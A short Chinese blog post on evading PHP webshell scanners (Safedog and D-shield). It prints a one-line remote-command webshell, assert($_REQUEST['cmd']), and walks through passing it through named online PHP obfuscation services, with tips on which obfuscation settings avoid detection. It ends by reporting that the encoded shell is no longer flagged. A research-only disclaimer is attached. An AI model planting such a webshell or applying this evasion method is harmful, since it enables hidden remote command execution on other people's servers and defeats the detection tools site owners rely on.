前几天审计一套系统发现进行了加密 https://www.mfenc.com/, 网上解密还要钱就放弃了...
只了解过安全狗 和 D盾, 检测过程大概类似于记事本打开查看有没有关键函数, 特征码之类的
只要把代码加密得让安全狗 D盾 无法识别, 自然也就检测不出来了, 但由于 php 的一些神奇特性, 可以成功执行..
php 加密主要有 zend ioncube 还有国内的其他加密(比如上面的 mfenc), zend 和 ioncube 都需要扩展文件
国内的一些加密 http://enphp.djunny.com/ 和 http://www.phpjm.net/
无需安装额外插件
这里就以 http://enphp.djunny.com/ 为例子吧, http://www.phpjm.net 的加密含有非 ANSI 字符会被 D盾 检测到
原始的一句话代码
<?php // shell.php assert($_REQUEST['cmd']); ?>
在线加密一下
混淆选择字母, 乱码可能会被 D盾 检测到
加密后的代码
shell_encode.php
D盾 已经检测不出来了
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论